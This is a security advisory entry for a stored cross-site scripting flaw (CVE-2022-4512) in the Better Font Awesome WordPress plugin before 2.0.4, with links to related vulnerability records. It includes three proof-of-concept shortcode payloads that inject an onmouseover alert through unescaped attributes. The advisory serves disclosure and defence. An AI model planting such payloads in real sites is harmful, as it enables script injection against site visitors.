Lucene search
Lana CodesWPEX-ID:7957F355-C767-4F59-BB28-0302D33386A6HistoryJan 18, 2023 - 12:00 a.m.
Better Font Awesome < 2.0.4 - Contributor+ Stored XSS
2023-01-1800:00:00
Lana Codes
165
font awesome
stored xss
contributor+
EPSS
0.001
Percentile
25.5%
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
[icon name='flag' class='4x border' title='" onmouseover="alert(/XSS/)']
[icon name='flag' unprefixed_class='" onmouseover="alert(/XSS/)//']
[icon name='flag' size='" onmouseover="alert(/XSS/)//']Related
cve
cve
CVE-2022-4512
2023-02-13 15:15:17
prion
prion
Cross site scripting
2023-02-13 15:15:00
cvelist
cvelist
CVE-2022-4512 Better Font Awesome < 2.0.4 - Contributor+ Stored XSS
2023-02-13 14:32:16
wpvulndb
wpvulndb
Better Font Awesome < 2.0.4 - Contributor+ Stored XSS
2023-01-18 00:00:00
nvd
nvd
CVE-2022-4512
2023-02-13 15:15:17
openvas
openvas
WordPress Better Font Awesome Plugin < 2.0.4 XSS Vulnerability
2023-07-21 00:00:00